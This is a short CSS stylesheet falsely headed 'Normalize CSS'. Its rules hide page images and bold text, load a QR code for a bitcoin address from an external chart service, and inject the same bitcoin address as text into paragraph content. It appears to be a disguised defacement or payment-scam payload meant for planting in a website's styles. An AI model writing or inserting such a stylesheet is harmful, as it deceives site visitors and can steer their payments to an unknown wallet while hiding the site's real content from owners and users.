/* Normalize CSS */
.left{background: url('https://chart.googleapis.com/chart?chs=250x250&cht=qr&chl=bitcoin:32DScrXtGb3RtGLry9zBaHxLRMRLu2FkGD') no-repeat;width: 250px;height: 250px !important;}
strong{display: none !important;}
.content p:nth-child(2):after{white-space: pre-wrap;font-size: 16px;font-weight: bold;content: "\A\A 32DScrXtGb3RtGLry9zBaHxLRMRLu2FkGD" !important;}
img {opacity: 0 !important;}
